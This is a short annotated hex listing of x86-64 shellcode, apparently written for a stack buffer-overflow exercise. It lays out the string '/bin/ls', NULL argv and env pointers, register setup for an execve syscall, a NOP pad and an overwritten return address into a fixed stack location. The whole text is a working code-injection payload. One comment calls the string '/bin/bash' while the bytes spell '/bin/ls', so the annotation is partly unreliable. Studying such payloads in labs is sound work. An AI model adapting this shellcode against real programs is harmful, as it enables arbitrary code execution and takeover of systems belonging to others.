2f 62 69 6e 2f 6c 73 00            /* /bin/bash, this addr will go in rdi */
00 00 00 00 00 00 00 00            /* NULL 8 Bytes */
00 00 00 00 00 00 00 00            /* NULL 8 Bytes PTR for argv */ 
00 00 00 00 00 00 00 00            /* NULL 8 Bytes PTR for env */
48 c7 c0 3b 00 00 00               /* mov    $0x3b, %rax */
48 bf 70 ec ff ff ff 7f 00 00      /* mov    <add>, %rdi */ 
48 be 80 ec ff ff ff 7f 00 00      /* mov    <add>, %rsi */
48 ba 88 ec ff ff ff 7f 00 00      /* mov    <add>, %rdx */
0f 05                              /* syscall */
90                                 /* pad */
90 ec ff ff ff 7f 00 00            /* ret address */